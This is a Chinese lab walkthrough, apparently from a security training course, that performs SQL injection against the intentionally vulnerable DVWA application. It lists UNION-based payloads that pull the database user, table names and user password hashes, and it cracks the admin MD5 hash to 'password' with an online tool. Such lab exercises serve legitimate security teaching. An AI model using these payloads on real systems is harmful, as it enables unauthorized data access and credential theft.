?
第1關:獲取dvwa環(huán)境
下載dvwa的時候其實已經通過了,但建議全部做一下,后面的要用
git clone GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)
第2關:獲取數據庫名稱、賬戶名、版本及操作系統(tǒng)信息
注入的sql:
1' union select user(),database()#
使用sql注入查詢數據庫用戶名和數據庫名,并將用戶名和數據庫名寫入/data/workspace/myshixun/result2中:
root@localhost dvwa
第3關:獲取數據庫表名、列名?
注入的sql語句:
1' UNION SELECT 1,table_name from information_schema.tables where table_schema='dvwa'#
使用sql注入查詢dvwa數據庫的所有表名,并將所有表明寫入/data/workspace/myshixun/result3中:
guestbook users
第4關:獲取用戶名密碼,并猜測root用戶
注入的sql語句:
1' union select user,password from users#
在出現(xiàn)的下列表中找到admin
?找到
5f4dcc3b5aa765d61d8327deb882cf99
在進行解密,我推薦一個解密的在線網站https://md5.cn/
?解密成功的文章來源:http://www.zghlxwxcb.cn/news/detail-562893.html
password
?文章來源地址http://www.zghlxwxcb.cn/news/detail-562893.html
到了這里,關于【實訓04】數據庫SQL注入漏洞的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!